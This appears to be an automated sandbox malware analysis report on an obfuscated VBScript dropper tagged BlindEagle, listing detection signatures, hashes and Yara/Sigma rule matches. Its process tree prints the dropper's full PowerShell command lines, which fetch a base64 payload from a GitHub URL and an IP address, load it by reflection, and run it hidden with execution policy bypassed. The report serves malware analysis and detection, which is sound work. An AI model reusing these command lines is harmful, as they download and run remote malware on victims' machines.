Edit tour
Windows
Analysis Report
uLfuBVyZFV.vbs
Overview
General Information
Sample name: | uLfuBVyZFV.vbsrenamed because original name is a hash value |
Original sample name: | 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs |
Analysis ID: | 1523829 |
MD5: | 123316fb7db9c910bd92a9ad7e7bbdbc |
SHA1: | 43dbabc790f0a0e20b397ad707bb33cb77004998 |
SHA256: | 79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6644 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\uLfuB VyZFV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2980 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRFbl Y6Y09NU1Bl Q1s0LDE1LD I1XS1qT2lO JycpKCAoKC dzQk91cmwg JysnPSBVJy snTkloJysn dHRwczonKy cvL3Jhdy4n KydnaXRodW InKyd1c2Un KydyY29udC crJ2VudC4n Kydjb20nKy cvJysnTicr J29EZXQnKy dlY3RPbi9O b0RldCcrJ2 VjdE8nKydu LycrJ3JlJy snZnMvaGVh ZCcrJ3MvbW Fpbi9EZXRh aCcrJ05vJy sndGgtVi4n Kyd0JysneH RVJysnTkk7 IHNCJysnT2 JhJysncycr J2U2JysnNE MnKydvbnRl bnQgPSAoTm UnKyd3LU9i amVjJysndC AnKydTJysn eXN0JysnZS crJ20nKycu TmV0LlcnKy dlYkNsaWVu dCkuRG93Jy snbmxvYWRT dHInKydpbm cnKycoJysn c0JPdXJsJy snKTsgc0In KydPYmluYX InKyd5Jysn Q29udGVudC AnKyc9IFtT JysneScrJ3 N0ZScrJ20u Q28nKyduJy sndicrJ2Vy dCcrJ106Ok Zyb21CJysn YScrJ3MnKy dlNjRTJysn dHJpbmcnKy coc0JPJysn YmFzZTY0Qy crJ28nKydu dGVudCk7Jy snIHMnKydC T2FzJysnc2 VtJysnYmx5 ID0gW1JlZm xlY3Rpb24u JysnQXNzZW 0nKydiJysn bCcrJ3ldOj onKydMb2En KydkKCcrJ3 NCT2JpbmFy eUNvbnRlbi crJ3QpOyBb JysnZG5saS crJ2IuSU8u JysnSG9tZV 0nKyc6OlZB SScrJygnKy doUEl0eHQu UlInKydCRC crJ0wvMDU0 LzQzJysnMS 4nKyc5Jysn MicrJzEuNj QuJysnODkn KycxLy8nKy c6cHR0aGhQ SSwgJysnaF BJZGVzYXRp dicrJ2EnKy dkb2hQSSwg JysnaFAnKy dJZCcrJ2Un KydzJysnYX QnKydpdmFk bycrJ2hQSS wgaCcrJ1BJ JysnZGVzYX RpdmEnKydk bycrJ2gnKy dQSSwgJysn aFAnKydJYX NwJysnbmV0 X3JlZ2Jyb3 dzJysnZScr J3JzaFBJLC crJyBoUEkn KydoJysnUE ksJysnaFBJ aCcrJ1AnKy dJKScpLUNS ZVBsQWNFIC dVTkknLFtD aGFSXTM5IC AtcmVQTEFj ZSAgJ2hQSS csW0NoYVJd MzQgIC1yZV BMQWNlICAo W0NoYVJdMT E1K1tDaGFS XTY2K1tDaG FSXTc5KSxb Q2hhUl0zNi kp';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7304 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ EnV:cOMSPe C[4,15,25] -jOiN'')( (('sBOurl '+'= U'+'N Ih'+'ttps: '+'//raw.' +'github'+ 'use'+'rco nt'+'ent.' +'com'+'/' +'N'+'oDet '+'ectOn/N oDet'+'ect O'+'n/'+'r e'+'fs/hea d'+'s/main /Detah'+'N o'+'th-V.' +'t'+'xtU' +'NI; sB'+ 'Oba'+'s'+ 'e6'+'4C'+ 'ontent = (Ne'+'w-Ob jec'+'t '+ 'S'+'yst'+ 'e'+'m'+'. Net.W'+'eb Client).Do w'+'nloadS tr'+'ing'+ '('+'sBOur l'+'); sB' +'Obinar'+ 'y'+'Conte nt '+'= [S '+'y'+'ste '+'m.Co'+' n'+'v'+'er t'+']::Fro mB'+'a'+'s '+'e64S'+' tring'+'(s BO'+'base6 4C'+'o'+'n tent);'+' s'+'BOas'+ 'sem'+'bly = [Reflec tion.'+'As sem'+'b'+' l'+'y]::'+ 'Loa'+'d(' +'sBObinar yConten'+' t); ['+'dn li'+'b.IO. '+'Home]'+ '::VAI'+'( '+'hPItxt. RR'+'BD'+' L/054/43'+ '1.'+'9'+' 2'+'1.64.' +'89'+'1// '+':ptthhP I, '+'hPId esativ'+'a '+'dohPI, '+'hP'+'Id '+'e'+'s'+ 'at'+'ivad o'+'hPI, h '+'PI'+'de sativa'+'d o'+'h'+'PI , '+'hP'+' Iasp'+'net _regbrows' +'e'+'rshP I,'+' hPI' +'h'+'PI,' +'hPIh'+'P '+'I)')-CR ePlAcE 'UN I',[ChaR]3 9 -rePLAce 'hPI',[Ch aR]34 -reP LAce ([Cha R]115+[Cha R]66+[ChaR ]79),[ChaR ]36))" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |